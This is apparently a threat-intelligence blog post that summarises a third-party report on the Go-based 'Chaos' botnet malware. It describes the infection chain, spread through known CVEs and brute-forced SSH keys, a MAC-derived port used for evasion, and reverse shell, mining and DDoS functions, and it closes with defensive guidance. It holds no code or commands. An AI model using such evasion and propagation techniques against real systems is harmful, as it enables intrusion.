September 28, 2022
CTIG Coverage of Black Lotus Labs’ Chaos Malware Report
September 28, 2022
Note: This blog post discusses active research by third parties into an ongoing threat. This information should be considered preliminary and will be updated as research continues.
On September 28, 2022, the threat intelligence section of Lumen’s Black Lotus Labs posted research into a novel, multifunctional Go-based malware that attacks a remarkable array of architectures from Linux servers to Microsoft systems, IoT devices, and SOHO routers. This malware not only functions across multiple environments but it has also been equipped to deploy just as many functions - from cryptomining to DDoS attacks, as well as serving as an Initial Access Vector.
Evolution of the Go Programming Language
The Go programming language was introduced in 2009 by designers at Google, specifically to operate across common platforms and highly networked systems with large codebases. Often referred to as “Golang,” it was released to the public in 2012. The language is a boon to programmers working with cloud applications, used in popular applications such as Docker and Kubernetes. However, it did not take long for the first Go-based malware to surface, having been detected in that same year.
Malware written in C and later Python remains dominant even today, but by 2019 samples written in Go began filtering into discovery more frequently. The adaptability of the language would not go overlooked by threat actors and criminals for long, by 2020 there were roughly 10,000 samples found in the wild. Because it is not yet as popular as the classics, Go is still difficult to reverse-engineer and analyze, and remains difficult to detect by many AV systems. Detection rates remain very low, which allows its use as the foundation for Command-and-Control (C2) networks, botnets, DDoS, and crypto-mining. Now it has become popular for e-crime, ransomware, and as the Black Lotus report shows, a general-purpose malware with a high degree of sophistication and adaptability.
Discovery of the “Chaos” Malware
Using telemetry from the Lumen global network, Black Lotus discovered and analyzed 100 samples of this malware, written in Chinese and using a China-based C2 infrastructure. Enumerating the infrastructure led to the targets of several distinct Chaos clusters, including a successful compromise of a GitLab server and a spate of recent DDoS attacks targeting the gaming, financial services and technology, and media and entertainment industries. These included a DDoS-as-a-service provider and a cryptocurrency exchange. Chaos represents an advanced form of the Golang malware evolution, designed to work across several architectures, including ARM, Intel (i386), MIPS, and PowerPC – in addition to both Windows and Linux operating systems. And unlike many botnets that spread through spam, Chaos proliferates through the use of known CVEs, as well as stolen or brute-forced SSH keys.
During their analysis, Black Lotus found source file names incorporating the word “Chaos,” references to Chaos in various function names, and the phrase incorporated in self-signed X.509 certificates. Their assessment of similarities in code and function leads to the belief this is an evolution of a previously known Go-based DDoS malware known as Kaiji, but the campaign is distinct from the ransomware given the same name.
Technical Analysis of the Chaos Infection Chain
Observing the figure below, the Chaos infection chain can be summarized as follows: the malware is installed on a host device, establishes persistence, and beacons out to the embedded C2. Based on the environment, the host will receive one or more staging commands; these will be either the exploitation of an applicable CVE or leveraging or brute-forcing SSH keys, to begin IP spoofing. Again based on the host, the following execution commands will direct propagation through the CVE to specified target lists and further exploitation of the target, launching DDoS attacks, beginning cryptomining, or simply serving as the initial access for a follow-on ransomware program.
The devil is in the details, to which the designers of this malware paid attention. Their efforts to remain undetected include a crafty piece of code that determines the UDP port they will reach out from. Using the first few numbers of the host’s MAC address as a key, they convert to hex and take those digits as the designated port. This is likely an extra step taken to keep from defining a port in the code, further shielding it from the analysis.
In addition to several new functions displayed by Chaos, the malware includes capabilities previously seen in the original Kaiji botnet: establish a reverse shell, initiate crypto mining, and/or launch DDoS attacks. And while the original botnet was designed to run on Linux servers, the modifications here take full advantage of the Go language and enable its use on many more platforms, as well as more versatility within those platforms.
For an exhaustive technical breakdown of the capabilities of Chaos, here is the report by Black Lotus.
Guidance for Chaos
What makes Chaos dangerous is that it takes advantage of the “natural camouflage” offered by using the Go language. Most users of small office/home office (SOHO) routers are unaccustomed to updating and patching their systems.
For those who have familiarity with their routers both large and small, continue to examine crontabs for abnormal entries, monitor for abnormal processes, and above all, asset management plays a key role. Discovering which assets are unpatched or not regularly monitored is a never-ending task for a defender, and can be a field of opportunity for attackers such as these.
Chaos primarily spreads through the exploitation of known vulnerabilities. Ensure effective patch management of newly discovered CVEs. Use the IoCs outlined in the original report to monitor for a Chaos infection, as well as connections to any suspicious infrastructure.
Consumers with SOHO routers: Follow best practices of regularly rebooting routers and installing security updates and patches. Users should leverage appropriately configured and updated EDR solutions on hosts, and regularly update software consistent with vendor patches where applicable. Remote workers: Change default passwords and disable remote root access on machines that don’t require it. Store SSH keys securely and only on devices that need them.
Businesses should consider comprehensive Secure Access Service Edge (SASE) and DDoS mitigation protections to bolster their security postures and enable robust detection of network-based communications.
CTIGs look into the future
CTIG will continue collaborating with the security research community to provide timely information on this threat as it evolves.
Are you looking to build your team’s skills? Get two months of your Cybrary for Teams subscription for free when you use promo code YOURTEAM20 at checkout!